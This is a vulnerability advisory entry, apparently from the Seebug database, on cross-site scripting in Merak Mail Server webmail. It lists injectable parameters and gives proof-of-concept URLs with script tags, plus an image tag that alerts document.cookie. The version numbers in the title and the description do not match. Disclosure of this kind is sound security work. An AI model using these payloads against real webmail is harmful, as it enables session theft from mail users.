Merak Mail Server 7.4.5 HTML Message Body XSS

2014-07-01T00:00:00
ID SSV:78112
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

漏洞描述: Merak Webmail Server 5.2.7版本中存在多个跨站脚本(XSS)漏洞。远程攻击者可以通过category, cserver, ext, global,showgroups, address.html中的showlite参数,或者spage 或者 settings.html中的autoresponder参数,readmail.html中的folder参数,或者 attachment.html中的attachmentpage_text_error参数 folder, ct, 或者 calendar.html中的 cv 参数, 标签, 或者电子邮件主题注入任意web脚本或HTML。 测试代码: /address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext= /address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext= /address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS] /address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext= /address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext= /address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext= /settings.html?autoresponder=1&id=[id]&spage=">[XSS] /settings.html?autoresponder=">[XSS]&id=[id]&spage=0 /attachment.html?attachmentpage_text_error=">[XSS] <IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="http://www.google.com"></body> </html> </IFRAME>

                                        
                                            
                                                source: http://www.securityfocus.com/bid/10966/info
   
The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities.
   
The vulnerabilities reported are:
- Multiple cross-site scripting vulnerabilities
- An HTML injection vulnerability
- A PHP source code disclosure vulnerability
- An SQL injection vulnerability
   
These vulnerabilities are reported to exist in versions prior to 7.5.2.

<IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="http://www.google.com"></body> </html> </IFRAME>